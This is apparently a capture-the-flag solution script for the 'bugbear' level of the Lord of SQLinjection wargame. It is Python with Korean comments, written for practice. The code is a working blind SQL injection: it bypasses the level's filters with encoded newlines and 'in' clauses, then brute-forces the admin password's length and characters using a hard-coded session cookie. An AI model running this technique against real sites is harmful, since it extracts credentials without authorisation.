(los[Lord of SQLinjection]) BUGBEAR

import requests password = "" for k in range(1, 20): url = "https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?no=1%0a||%0aid%0ain%0a(%22admin%22)%0a%26%26%0alength(pw)%0ain%0a(" + str(k)+ ")" r = requests.post(url, cookies=(dict(PHPSESSID="dj88169ielhc1qeiqs7jkhckv7"))) print("try password length = " + str(k)) if 'Hello admin' in r.text: print("[+] find password length = " + str(k)) for j in range(1, k+1): # 1~8자리 패스워드를 찾아야함 print("%d" % j) # 현재 몇번째 인지 표시 for i in range(48, 128): # 대부분의 글자들 다 찾아내기 if 58 <= i <= 64: continue if 91 <= i <= 96: continue try: # 시작! url = "https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?no=1%0a||%0aid%0ain%0a(%22admin%22)%0a%26%26%0aright(left(pw," + str(j) + "),1)%0ain%0a(" + chr(i) + ")" print(url) r = requests.post(url, cookies=(dict(PHPSESSID="dj88169ielhc1qeiqs7jkhckv7"))) # 자신의 Session ID를 넣어야함. print(str(j) + "번째 찾는 중 : " + chr(i)) # 대략적인 현재 위치를 확인하기 위함, 없어도 되는 코드 except: # 예외는 반드시! print("Error") continue if 'Hello admin' in r.text: # 글자를 찾았을 경우! password = password + chr(i) print("[+]Password : " + password) break break